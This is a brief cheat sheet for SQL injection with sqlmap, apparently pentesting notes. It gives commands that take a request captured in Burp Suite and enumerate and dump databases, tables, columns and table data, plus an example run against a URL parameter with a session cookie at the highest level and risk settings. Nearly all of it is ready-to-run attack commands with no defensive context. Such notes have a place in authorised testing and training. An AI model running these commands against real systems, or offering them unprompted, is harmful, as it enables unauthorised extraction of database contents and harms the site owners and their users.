SQL Injection
SQLmap
Use Burp Suite to intercept the request, save the request as req.txt, and run the following command:
sqlmap -r req.txt --dump
Exfiltrating database names
sqlmap -r req.txt --dbs
Listing the table names
sqlmap -r req.txt -D <database_name> --tables
Choosing an interesting table and listing its columns
sqlmap -r req.txt -D <database_name> -T <table_name> --columns
Listing the table data
sqlmap -r req.txt -D <database_name> -T <table_name> -C <column1>,<column2> --dump
Example
sqlmap -u "http://url?env=test" --cookie "PHPSESSID=956b09da0d6f65eeaa76092a3e5becaa" --level 5 --risk 3 --batch --threads 5 --random-agent -p "env"